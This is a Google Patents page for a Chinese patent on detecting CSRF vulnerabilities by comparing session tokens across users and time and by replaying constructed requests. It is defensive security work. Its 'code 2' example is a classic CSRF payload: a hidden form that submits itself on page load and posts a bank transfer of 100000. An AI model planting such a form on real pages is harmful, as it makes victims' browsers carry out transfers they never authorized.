CN110113366B - CSRF vulnerability detection method and device, computing device and storage medium - Google Patents
CSRF vulnerability detection method and device, computing device and storage medium Download PDFInfo
- Publication number
- CN110113366B CN110113366B CN201910549709.XA CN201910549709A CN110113366B CN 110113366 B CN110113366 B CN 110113366B CN 201910549709 A CN201910549709 A CN 201910549709A CN 110113366 B CN110113366 B CN 110113366B
- Authority
- CN
- China
- Prior art keywords
- detected
- access
- token
- url
- access request
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Active
Links
Images
Classifications
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/08—Network architectures or network communication protocols for network security for authentication of entities
- H04L63/0807—Network architectures or network communication protocols for network security for authentication of entities using tickets, e.g. Kerberos
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1433—Vulnerability analysis
Landscapes
- Engineering & Computer Science (AREA)
- Computer Security & Cryptography (AREA)
- Computer Hardware Design (AREA)
- Computing Systems (AREA)
- General Engineering & Computer Science (AREA)
- Computer Networks & Wireless Communication (AREA)
- Signal Processing (AREA)
- Information Transfer Between Computers (AREA)
Abstract
The invention discloses a CSRF vulnerability detection method and a CSRF vulnerability detection device, wherein the method comprises the following steps: determining whether a first access identifier Token carried in a first access response returned by the URL site to be detected is consistent with a second access identifier Token carried in a second access response returned by the URL site to be detected; the first user is different from the second user; if the first user login state information is inconsistent with the second user login state information, sending a third access request carrying the first user login state information to the URL site to be detected when the set time is up; and if the third Token in the third access response corresponding to the third access request is consistent with the first Token, determining that the URL to be detected has the CSRF vulnerability. The method provided by the invention aims to solve the problems of single detection means and low detection accuracy in CSRF vulnerability detection in the prior art.
Description
Technical Field
The invention relates to the technical field of financial technology (Fintech), in particular to a CSRF vulnerability detection method and device.
Background
With the development of computer technology, more and more technologies are applied in the financial field, the traditional financial industry is gradually changing to financial technology (Finteh), and higher requirements are provided for vulnerability detection technology due to the requirements of security and real-time performance of the financial industry.
Cross-site request forgery (CSRF) is a malicious exploitation of websites. Some financial platforms have a leak in service function, and the CSRF enables hackers to pretend to be the identity of a legitimate user, so that the legitimate user can unknowingly trigger dangerous operations such as financial payment and transfer, and the security of funds and account numbers of the user is directly affected.
At present, a detection method aiming at CSRF exists, but the problems of single detection means and low detection accuracy exist in both manual detection and automatic detection.
Disclosure of Invention
The embodiment of the invention provides a detection method of a CSRF vulnerability, aiming at solving the problems of single detection means and low detection accuracy of the CSRF vulnerability in the prior art.
In a first aspect, an embodiment of the present invention provides a method for detecting a cross-site request forgery CSRF vulnerability, including:
determining whether a first access identifier Token carried in a first access response returned by the URL site to be detected is consistent with a second access identifier Token carried in a second access response returned by the URL site to be detected; the first access response is sent aiming at a first access request carrying first user login state information; the second access response is sent aiming at a second access request carrying second user login state information; the first user is different from the second user;
if the first user login state information is inconsistent with the second user login state information, sending a third access request carrying the first user login state information to the URL site to be detected when the set time is up; and if the third Token in the third access response corresponding to the third access request is consistent with the first Token, determining that the URL to be detected has the CSRF vulnerability.
In the technical scheme, the Token aiming at different user information is added to the detection mode of the CSRF vulnerability, and if the tokens of different users in the access response are the same, the CSRF vulnerability exists with high possibility; after the Token detection aiming at different user information is passed, carrying out Token detection in different time periods; if the Token of the same user in different time periods is the same, the CSRF vulnerability is more likely to exist. It can be seen that, in the above technical scheme, token detection of different user information and Token detection of the same user in different time periods are introduced, so that Token detection means are enriched, and detection accuracy is improved.
In a possible implementation manner, if a third Token in a third access response corresponding to the third access request by the server is not consistent with the first Token, the method further includes:
constructing a fourth access request which accords with the interaction mode of the URL to be detected;
sending the fourth access request to the URL site to be detected;
if a fourth access response corresponding to the fourth access request is matched with a fifth access response, determining that the URL to be detected has a CSRF vulnerability; the fifth access response is a response of the URL to be detected to a legal access request. It should be noted that: the fourth access request may also be the first access request and thus the fifth access response may also be the first access response.
In the technical scheme, after the Token detection of different user information and the Token detection of the same user in different time periods are passed, a constructed access request and a legal access request detection mode are further provided; if the constructed response of the access request matches the response of the legitimate access request (e.g., has high similarity), it is determined that a CSRF vulnerability exists. According to the technical scheme, the detection means is further added, so that the detection accuracy is improved.
In one possible implementation manner, the interaction manner of the URL site is in Ajax format; before sending the fourth access request to the URL site to be detected, the method further includes:
and setting a sending end of the fourth access request to carry cookie information when supporting cross-domain access.
In the technical scheme, different access requests are constructed according to different interaction modes, so that the detection of the CSRF vulnerability can be realized, and the detection accuracy is ensured.
In a possible implementation manner, before determining whether a first access identifier Token carried in a first access response returned by the URL site to be detected is consistent with a second access identifier Token carried in a second access response returned by the URL page to be detected, the method further includes:
crawling each data packet of the URL site to be detected; acquiring the first access response and the second access response from each data packet; or constructing the first login request and sending the first login request to the URL site to be detected; and constructing the second login request and sending the second login request to the URL site to be detected.
In the technical scheme, two implementation modes related to the login request are provided, one mode is to crawl a data packet on a network, and the constructed login request can accord with the actual situation; another is to construct the login request directly, which can make the construction more flexible.
In another possible implementation manner, before determining whether a first access identifier Token carried in a first access response returned by the URL site to be detected is consistent with a second access identifier Token carried in a second access response returned by the URL page to be detected, the method further includes:
determining that the first Token and the second Token are not in a blacklist.
According to the technical scheme, before Token detection of different user information is carried out, blacklist judgment is also carried out; if the Token is in the blacklist, determining that the CSRF vulnerability exists; otherwise, token detection of different user information is performed. The technical scheme can further improve the detection efficiency of the CSRF loophole.
In a second aspect, an embodiment of the present invention further provides an apparatus for detecting a cross-site request spoofing CSRF vulnerability, where the apparatus includes:
a determination unit: the method is used for determining whether a first access identifier Token carried in a first access response returned by the URL site to be detected is consistent with a second access identifier Token carried in a second access response returned by the URL site to be detected; the first access response is sent aiming at a first login request carrying first user login state information; the access response is sent aiming at a second login request carrying second user login state information; the first user is different from the second user;
a detection unit: the third access request carrying the login state information of the first user is sent to the URL site to be detected when the first Token is inconsistent with the second Token and the set time is up; and if the third Token in the third access response corresponding to the third access request is consistent with the first Token, determining that the URL to be detected has the CSRF vulnerability.
In a possible implementation manner, the detection unit is further configured to:
constructing a fourth access request according with the interaction mode of the URL site to be detected;
sending the fourth access request to the URL site to be detected;
if a fourth access response corresponding to the fourth access request is matched with a fifth access response, determining that the URL to be detected has a CSRF vulnerability; the fifth access response is a response of the URL to be detected to a legal access request.
In a possible implementation manner, the detection apparatus further includes:
the acquisition unit is used for crawling each data packet of the URL site to be detected;
the determination unit: and further configured to determine that the first Token and the second Token are not on a blacklist.
In a third aspect, an embodiment of the present invention further provides a computing device, including:
a memory for storing program instructions;
and the processor is used for calling the program instructions stored in the memory and executing the method of the first aspect or any embodiment of the first aspect according to the obtained program.
In a fourth aspect, the present invention also provides a computer-readable non-volatile storage medium, which includes computer-readable instructions, and when the computer-readable instructions are read and executed by a computer, the computer is caused to execute the first aspect or the method of any embodiment of the first aspect.
Drawings
The accompanying drawings, which are included to provide a further understanding of the invention and are incorporated in and constitute a part of this specification, illustrate embodiments of the invention and together with the description serve to explain the invention and not to limit the invention. In the drawings:
FIG. 1 is a schematic diagram of a possible system architecture according to an embodiment of the present invention;
fig. 2 is a schematic flow chart illustrating an implementation of a method for detecting a CSRF vulnerability according to an embodiment of the present invention;
fig. 3 is a schematic diagram of a detection apparatus for CSRF vulnerability according to an embodiment of the present invention.
Detailed Description
In order to make the objects, technical solutions and advantages of the present invention more clearly understood, the present invention is further described in detail below with reference to the accompanying drawings and embodiments. It should be understood that the specific embodiments described herein are merely illustrative of the invention and are not intended to limit the invention.
Fig. 1 is a schematic diagram of a possible system architecture provided in the present application, as shown in fig. 1, including: a plurality of access devices 101, an access server 102. The access device 101 may be a personal computer, a mobile phone terminal, or the like, and the access server 102 provides a page access service for the user.
For each access device 101, a login operation is generally required first when accessing the access server 102. Specifically, the access device 101 sends a login request to the access server 102, where the login request includes information identifying the identity of the user, typically a user name and a password. After the access server 102 verifies that the login request passes, it sends an access response to the access device 101, where the access response generally carries Cookie information allocated by the access server 102 for the user. Cookie information may be stored in the browser of the access device 101 for the user to subsequently access the access server 102 without having to fill in login information again. However, if the access device 101 is implanted with a CSRF vulnerability, the browser may send various access requests to the access server 102 using Cookie information without the user's knowledge.
The first embodiment is as follows:
in order to detect the CSRF vulnerability, as shown in fig. 2, an embodiment of the present invention provides a method for detecting a cross-site request forgery CSRF vulnerability, including the following steps:
s11, determining a first access identifier Token carried in a first access response returned by the URL site to be detected; the first access response is sent aiming at a first access request carrying first user login state information;
s12, determining a second Token carried in a second access response returned by the URL site to be detected; the second access response is sent aiming at a second access request carrying second user login state information; the first user is different from the second user.
There is no precedence relationship between the step S11 and the step S12, as long as two tokens returned by two different users for the same URL site can be obtained.
S13, judging whether the first access identifier Token is consistent with the second access identifier Token or not;
s14, if the first user login state information is inconsistent with the second user login state information, sending a third access request carrying the first user login state information to the URL site to be detected when the set time is up;
the setting time in step S14 may be set by itself, so as to satisfy the effective use duration of the Cookie information. Although the first Token is taken as an example for the description of this step, the second Token or the third Token may be used as long as the Token satisfies the time of two accesses reaching the set time.
Specifically, examples are 10 a.m.: 00 a bank user inquires the account balance, assuming that at this time, tokenA is acquired, and if the set time is 2 minutes, 10 am: 03 again inquires the account balance or transfers, assuming that at this time, tokenB is obtained, tokenA and TokenB should be different.
S15, if a third Token in a third access response corresponding to the third access request is consistent with the first Token, determining that the URL site to be detected has a CSRF vulnerability. In the above embodiment, token detection of different user information is performed in step S13, so as to avoid CSRF vulnerability caused when different users have the same Token; in step S15, token detection is performed for different periods of time for the same user, so as to avoid CSRF vulnerability caused by too long Token valid duration.
In a possible implementation manner, taking fig. 2 as an example, after step S15, if a third Token in a third access response corresponding to the third access request of the URL site to be detected is not consistent with the first Token, the method further includes:
s16, constructing a fourth access request which accords with the interaction mode of the URL to be detected;
s17, sending the fourth access request to the URL site to be detected;
s18, if a fourth access response corresponding to the fourth access request is matched with a fifth access response, determining that the URL site to be detected has a CSRF vulnerability; the fifth access response is a response of the URL to be detected to the legal access request.
In the implementation mode, a fourth access request similar to or consistent with the legal access request is constructed aiming at the response of the legal access request; and if the fourth access response corresponding to the fourth access request is matched with the fifth access response, determining that the URL to be detected has the CSRF vulnerability.
Taking a legal access request as a modification request aiming at published contents as an example, and constructing a fourth access request according to the crawled legal access request; the content of the fourth access request may be the same as the legitimate access request. If the fourth access response is received, determining whether the fourth access response is matched with a fifth access response corresponding to the legal access request, such as whether the returned page is consistent or whether the similarity is greater than a similarity threshold; and if the URL sites to be detected are matched, determining that the CSRF vulnerability exists in the URL sites to be detected. And if the URL to be detected refuses the fourth access request, determining that the URL to be detected has the defense capability of the CSRF vulnerability. It should be noted that: the fourth access request may be the first access request in step S11 described above, and thus the fifth access response may also be the first access response.
In a possible implementation manner, taking fig. 2 as an example, before step S11, the method further includes:
step S10, determining that the first Token and the second Token are not in a blacklist. Before Token detection of different user information is carried out, blacklist judgment is also carried out; if the crawled Token is in the blacklist, determining that the CSRF loophole exists; otherwise, token detection of different user information is performed. The technical scheme can further improve the detection efficiency of the CSRF loophole.
For the first access response in step S11 and the second access response in step S12, the following two possible implementations are provided.
The first method is as follows: crawling each data packet of the URL site to be detected; acquiring the first access response and the second access response from each data packet;
the second method comprises the following steps: constructing the first access request and sending the first access request to the URL site to be detected; and constructing the second access request and sending the second access request to the URL site to be detected.
Generally, a more effective and concise detection mode can be constructed by obtaining historical access information of a user through web crawling. For example, in step S11 and step S12, the Token information of different crawled users may be compared, and meanwhile, a plurality of users on the network may be compared, so as to further ensure the accuracy of the detection means.
At present, in a detection mode aiming at CSRF vulnerability, an access request in a Form format is basically submitted; however, a request body in the JSON and XML format may exist in the site to be detected, and at this time, an access request which cannot be provided by using the Form format for access may occur. Based on the CSRF vulnerability detection method, the CSRF vulnerability detection method is provided based on the access requests of the sites to be detected in different formats. Specifically, the following two implementation manners are provided for constructing the fourth access request conforming to the interaction manner of the URL site to be detected in step S16.
In general, whether the access request is in a Form format can be judged through a Form label in the crawled page code. The following code 1 is a legal access request, which can be seen as a Form format access request with a Form tag.
<form action="action_page.php">
First name:<br>
<input type="text"name="firstname"value="Mickey">
<br>
Last name:<br>
<input type="text"name="lastname"value="Mouse">
<br><br>
<input type="submit"value="Submit">
</form>
If the access request is in a Form format, adding a code in the local HTML file, and constructing a fourth access request by replacing name and value of < input >, the following code 2 is an example:
<body onload="document.forms[0].submit()">
<form action="http://bank.com/transfer.do"method="POST">
<input type="hidden"name="acct"value="MARIT"/>
<input type="hidden"name="amount"value="100000"/>
<input type="submit"name="View my picture"/>
<form>
and determining whether the CSRF vulnerability exists by comparing a fifth access response corresponding to the legal access request of the code 1 with a fourth access response corresponding to the fourth access request.
And judging whether the access request is an access request of an Ajax interactive mode or not through the Ajax label in the crawled page code. And if the submission is judged to be the Ajax interactive mode, constructing a fourth access request sent by the Ajax interactive mode by replacing the data of the send. An example of Ajax interaction is as follows code 3:
in the implementation of the detection mode, if a request sent by the Ajax interactive mode is constructed, the browser can verify whether the client and the server are in the same domain or not, and if not, the browser does not exist in the same domain. The property of withcreatials of the sending end needs to be set to True, that is, cookie information is carried when cross-domain access is supported. In other words, the browser of the access device 101 needs to be set to support cross-domain access to carry cookie information so that the detection process described above can be performed.
The cross-domain request means that the domain of the current initiated request is different from the domain where the resource pointed by the request is located, and here, the same protocol, domain name and port number are the same, namely the same domain.
If the request is submitted in the Form format of the constructed Form, the browser of the access device 101 does not check whether the domain where the browser is located is the same as the domain of the site to be detected, and directly sends the request out, so that the browser of the access device 101 does not need to be set to support the cross-domain request.
However, when a request for sending an Ajax interactive mode is constructed, the browser of the access device 101 checks whether the domain where the browser is located is the same as the domain where the site to be detected is located, and if the browser of different access devices 101 cannot send out the request, the browser of the access device 101 needs to be set to support the cross-domain request.
In the technical scheme, different access requests are constructed according to different message formats, so that the detection of the CSRF vulnerability can be realized, and the detection accuracy is ensured.
Based on the same inventive concept, the embodiment of the present invention further provides a device for detecting a cross-site request forgery CSRF vulnerability, and because the principle of solving the problem by the device is similar to that of the method for detecting the cross-site request forgery CSRF vulnerability, the implementation of the device can refer to the implementation of the method, and repeated parts are not described again.
As shown in fig. 3, a schematic structural diagram of a detection apparatus for CSRF vulnerability according to a second embodiment of the present invention includes: a determination unit 32 and a detection unit 33, wherein:
a determination unit: the method comprises the steps of determining whether a first access identifier Token carried in a first access response returned by the URL site to be detected is consistent with a second access identifier Token carried in a second access response returned by the URL site to be detected; the first access response is sent aiming at a first login request carrying first user login state information; the second access response is sent aiming at a second access request carrying second user login state information; the first user is different from the second user;
a detection unit: the third access request carrying the login state information of the first user is sent to the URL site to be detected when the first Token is inconsistent with the second Token and the set time is up; and if the third Token in the third access response corresponding to the third access request is consistent with the first Token, determining that the URL site to be detected has a CSRF vulnerability.
Further, the detection unit is further configured to:
constructing a fourth access request which accords with the interaction mode of the URL to be detected;
sending the fourth access request to the URL site to be detected;
if a fourth access response corresponding to the fourth access request is consistent with a fifth access response, determining that the URL site to be detected has a CSRF vulnerability; the fifth access response is a response of the URL to be detected to a legal access request.
In specific implementation, the detection device further includes:
the acquiring unit 31 is configured to crawl each data packet of the URL site to be detected;
the determination unit: and further configured to determine that the first Token and the second Token are not on a blacklist.
The cross-site request forgery CSRF defense authentication apparatus provided by the above-described embodiments of the present application can be implemented by a computer program. It should be understood by those skilled in the art that the above-mentioned module division is only one of many module division, and if the module division is divided into other modules or not, it is within the scope of the present application as long as the cross-site request forgery CSRF defense authentication device has the above-mentioned functions.
Based on the same inventive concept, an embodiment of the present invention further provides a computer device, including:
a memory for storing program instructions;
and the processor is used for calling the program instructions stored in the memory and executing the detection method of the CSRF loophole in the embodiment according to the obtained program.
Based on the same inventive concept, an embodiment of the present invention further provides a computer-readable non-volatile storage medium, which includes computer-readable instructions, and when the computer reads and executes the computer-readable instructions, the computer is caused to execute the method for detecting a CSRF vulnerability in the foregoing embodiment. As will be appreciated by one skilled in the art, embodiments of the present application may be provided as a method, system, or computer program product. Accordingly, the present application may take the form of an entirely hardware embodiment, an entirely software embodiment or an embodiment combining software and hardware aspects. Furthermore, the present application may take the form of a computer program product embodied on one or more computer-usable storage media (including, but not limited to, disk storage, CD-ROM, optical storage, and the like) having computer-usable program code embodied therein.
The present application is described with reference to flowchart illustrations and/or block diagrams of methods, apparatus (systems), and computer program products according to the application. It will be understood that each flow and/or block of the flowchart illustrations and/or block diagrams, and combinations of flows and/or blocks in the flowchart illustrations and/or block diagrams, can be implemented by computer program instructions. These computer program instructions may be provided to a processor of a general purpose computer, special purpose computer, embedded processor, or other programmable data processing apparatus to produce a machine, such that the instructions, which execute via the processor of the computer or other programmable data processing apparatus, create means for implementing the functions specified in the flowchart flow or flows and/or block diagram block or blocks.
These computer program instructions may also be stored in a computer-readable memory that can direct a computer or other programmable data processing apparatus to function in a particular manner, such that the instructions stored in the computer-readable memory produce an article of manufacture including instruction means which implement the function specified in the flowchart flow or flows and/or block diagram block or blocks.
These computer program instructions may also be loaded onto a computer or other programmable data processing apparatus to cause a series of operational steps to be performed on the computer or other programmable apparatus to produce a computer implemented process such that the instructions which execute on the computer or other programmable apparatus provide steps for implementing the functions specified in the flowchart flow or flows and/or block diagram block or blocks.
It will be apparent to those skilled in the art that various changes and modifications may be made in the present application without departing from the spirit and scope of the application. Thus, if such modifications and variations of the present application fall within the scope of the claims of the present application and their equivalents, the present application is intended to include such modifications and variations as well.
Claims (10)
1. A method for detecting cross-site request spoofing CSRF vulnerability, the method comprising:
determining whether a first access identifier Token carried in a first access response returned by the URL site to be detected is consistent with a second access identifier Token carried in a second access response returned by the URL site to be detected; the first access response is sent aiming at a first access request carrying first user login state information; the second access response is sent aiming at a second access request carrying second user login state information; the first user is different from the second user;
if the first user login state information is inconsistent with the second user login state information, sending a third access request carrying the first user login state information to the URL site to be detected when the set time is up;
and if the third Token in the third access response corresponding to the third access request is consistent with the first Token, determining that the URL site to be detected has a CSRF vulnerability.
2. The method as claimed in claim 1, wherein if the third Token in the third access response corresponding to the third access request is inconsistent with the first Token, the method further comprises:
constructing a fourth access request which accords with the interaction mode of the URL to be detected;
sending the fourth access request to the URL site to be detected;
if a fourth access response corresponding to the fourth access request is the same as a fifth access response, determining that the URL site to be detected has a CSRF vulnerability; the fifth access response is a response of the URL to be detected to a legal access request.
3. The detection method according to claim 2, wherein the interaction mode of the URL site to be detected is asynchronous JavaScript and XML Ajax;
before sending the fourth access request to the URL site to be detected, the method further includes:
and setting a sending end of the fourth access request to carry cookie information when supporting cross-domain access.
4. The detection method according to claim 1, before determining whether a first Token carried in a first access response returned by the URL site to be detected is consistent with a second Token carried in a second access response returned by the URL page to be detected, further comprising:
crawling each data packet of the URL site to be detected; acquiring the first access response and the second access response from each data packet; or
Constructing the first access request and sending the first access request to the URL site to be detected; and constructing the second access request and sending the second access request to the URL site to be detected.
5. The detection method according to claim 1, before determining whether a first Token carried in a first access response returned by the URL site to be detected is consistent with a second Token carried in a second access response returned by the URL page to be detected, further comprising:
determining that the first Token and the second Token are not in a blacklist.
6. An apparatus for detecting cross-site request spoofing of CSRF vulnerabilities, the apparatus comprising:
a determination unit: the method is used for determining whether a first access identifier Token carried in a first access response returned by the URL site to be detected is consistent with a second access identifier Token carried in a second access response returned by the URL site to be detected; the first access response is sent aiming at a first login request carrying first user login state information; the second access response is sent aiming at a second access request carrying second user login state information; the first user is different from the second user;
a detection unit: the third access request carrying the login state information of the first user is sent to the URL site to be detected when the first Token is inconsistent with the second Token and the set time is up; and if the third Token in the third access response corresponding to the third access request is consistent with the first Token, determining that the URL to be detected has the CSRF vulnerability.
7. The detection apparatus of claim 6, wherein the detection unit is further configured to:
constructing a fourth access request which accords with the interaction mode of the URL to be detected;
sending the fourth access request to the URL site to be detected;
if a fourth access response corresponding to the fourth access request is the same as a fifth access response, determining that the URL to be detected has a CSRF vulnerability; the fifth access response is a response of the URL to be detected to a legal access request.
8. The detection device of claim 6, further comprising:
the acquisition unit is used for crawling each data packet of the URL site to be detected;
the determination unit: and further configured to determine that the first Token and the second Token are not on a blacklist.
9. A computing device, comprising:
a memory for storing program instructions;
a processor for calling program instructions stored in said memory to execute the method of any one of claims 1 to 5 in accordance with the obtained program.
10. A computer readable non-transitory storage medium comprising computer readable instructions which, when read and executed by a computer, cause the computer to perform the method of any one of claims 1 to 5.
Priority Applications (2)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN201910549709.XA CN110113366B (en) | 2019-06-24 | 2019-06-24 | CSRF vulnerability detection method and device, computing device and storage medium |
| PCT/CN2020/096900 WO2020259389A1 (en) | 2019-06-24 | 2020-06-18 | Csrf vulnerability detection method and apparatus |
Applications Claiming Priority (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN201910549709.XA CN110113366B (en) | 2019-06-24 | 2019-06-24 | CSRF vulnerability detection method and device, computing device and storage medium |
Publications (2)
| Publication Number | Publication Date |
|---|---|
| CN110113366A CN110113366A (en) | 2019-08-09 |
| CN110113366B true CN110113366B (en) | 2022-12-27 |
Family
ID=67495661
Family Applications (1)
| Application Number | Title | Priority Date | Filing Date |
|---|---|---|---|
| CN201910549709.XA Active CN110113366B (en) | 2019-06-24 | 2019-06-24 | CSRF vulnerability detection method and device, computing device and storage medium |
Country Status (2)
| Country | Link |
|---|---|
| CN (1) | CN110113366B (en) |
| WO (1) | WO2020259389A1 (en) |
Families Citing this family (7)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN110113366B (en) * | 2019-06-24 | 2022-12-27 | 深圳前海微众银行股份有限公司 | CSRF vulnerability detection method and device, computing device and storage medium |
| CN111104675A (en) * | 2019-11-15 | 2020-05-05 | 泰康保险集团股份有限公司 | Method and device for detecting system security vulnerability |
| CN111404937B (en) * | 2020-03-16 | 2021-12-10 | 腾讯科技(深圳)有限公司 | Method and device for detecting server vulnerability |
| CN111597424A (en) * | 2020-07-21 | 2020-08-28 | 平安国际智慧城市科技股份有限公司 | Crawler identification method and device, computer equipment and storage medium |
| CN112419674A (en) * | 2020-10-26 | 2021-02-26 | 四川大学 | System and method for monitoring debris flow geological disasters |
| CN112866265B (en) * | 2021-01-27 | 2023-03-24 | 湖南快乐阳光互动娱乐传媒有限公司 | CSRF attack protection method and device |
| CN114499960B (en) * | 2021-12-24 | 2024-03-22 | 深圳开源互联网安全技术有限公司 | CSRF vulnerability identification method, device and computer readable storage medium |
Citations (5)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| US8601586B1 (en) * | 2008-03-24 | 2013-12-03 | Google Inc. | Method and system for detecting web application vulnerabilities |
| CN104573486A (en) * | 2013-10-16 | 2015-04-29 | 深圳市腾讯计算机系统有限公司 | Vulnerability detection method and device |
| CN104660556A (en) * | 2013-11-20 | 2015-05-27 | 深圳市腾讯计算机系统有限公司 | Cross site request forgery vulnerability detection method and device |
| CN108197467A (en) * | 2018-01-11 | 2018-06-22 | 郑州云海信息技术有限公司 | A kind of automated detection method and system of CSRF loopholes |
| CN108769070A (en) * | 2018-06-30 | 2018-11-06 | 平安科技(深圳)有限公司 | One kind is gone beyond one's commission leak detection method and device |
Family Cites Families (3)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| US8332654B2 (en) * | 2008-12-08 | 2012-12-11 | Oracle International Corporation | Secure framework for invoking server-side APIs using AJAX |
| CN108429746B (en) * | 2018-03-06 | 2020-01-03 | 华中科技大学 | Privacy data protection method and system for cloud tenants |
| CN110113366B (en) * | 2019-06-24 | 2022-12-27 | 深圳前海微众银行股份有限公司 | CSRF vulnerability detection method and device, computing device and storage medium |
-
2019
- 2019-06-24 CN CN201910549709.XA patent/CN110113366B/en active Active
-
2020
- 2020-06-18 WO PCT/CN2020/096900 patent/WO2020259389A1/en active Application Filing
Patent Citations (5)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| US8601586B1 (en) * | 2008-03-24 | 2013-12-03 | Google Inc. | Method and system for detecting web application vulnerabilities |
| CN104573486A (en) * | 2013-10-16 | 2015-04-29 | 深圳市腾讯计算机系统有限公司 | Vulnerability detection method and device |
| CN104660556A (en) * | 2013-11-20 | 2015-05-27 | 深圳市腾讯计算机系统有限公司 | Cross site request forgery vulnerability detection method and device |
| CN108197467A (en) * | 2018-01-11 | 2018-06-22 | 郑州云海信息技术有限公司 | A kind of automated detection method and system of CSRF loopholes |
| CN108769070A (en) * | 2018-06-30 | 2018-11-06 | 平安科技(深圳)有限公司 | One kind is gone beyond one's commission leak detection method and device |
Also Published As
| Publication number | Publication date |
|---|---|
| CN110113366A (en) | 2019-08-09 |
| WO2020259389A1 (en) | 2020-12-30 |
Similar Documents
| Publication | Publication Date | Title |
|---|---|---|
| CN110113366B (en) | CSRF vulnerability detection method and device, computing device and storage medium | |
| CN107612895B (en) | Internet anti-attack method and authentication server | |
| CN107135073B (en) | Interface calling method and device | |
| US11625720B2 (en) | Secure in-line payments for rich internet applications | |
| CN106779716B (en) | Authentication method, device and system based on block chain account address | |
| US9578004B2 (en) | Authentication of API-based endpoints | |
| WO2015169158A1 (en) | Information protection method and system | |
| CN107046544B (en) | Method and device for identifying illegal access request to website | |
| US9887997B2 (en) | Web authentication using client platform root of trust | |
| US9294479B1 (en) | Client-side authentication | |
| US20100146609A1 (en) | Method and system of securing accounts | |
| US10015191B2 (en) | Detection of man in the browser style malware using namespace inspection | |
| KR20150036104A (en) | Method, client, server and system of login verification | |
| USRE47533E1 (en) | Method and system of securing accounts | |
| CN110690972B (en) | Token authentication method and device, electronic equipment and storage medium | |
| JP2013211020A (en) | Method and apparatus for preventing phishing attacks | |
| RU2678643C1 (en) | Service package inquiries limitation method and device | |
| CN109167780B (en) | Method, device, system and medium for controlling resource access | |
| CN107733883B (en) | Method and device for detecting account numbers registered in batches | |
| US20210203668A1 (en) | Systems and methods for malicious client detection through property analysis | |
| CN110958119A (en) | Identity verification method and device | |
| US10834074B2 (en) | Phishing attack prevention for OAuth applications | |
| CN110704820A (en) | Login processing method and device, electronic equipment and computer readable storage medium | |
| WO2018112878A1 (en) | Token mechanism-based system and method for detecting and defending against cc attack | |
| CN114422139B (en) | API gateway request security verification method, device, electronic equipment and computer readable medium |
Legal Events
| Date | Code | Title | Description |
|---|---|---|---|
| PB01 | Publication | ||
| PB01 | Publication | ||
| SE01 | Entry into force of request for substantive examination | ||
| SE01 | Entry into force of request for substantive examination | ||
| GR01 | Patent grant | ||
| GR01 | Patent grant |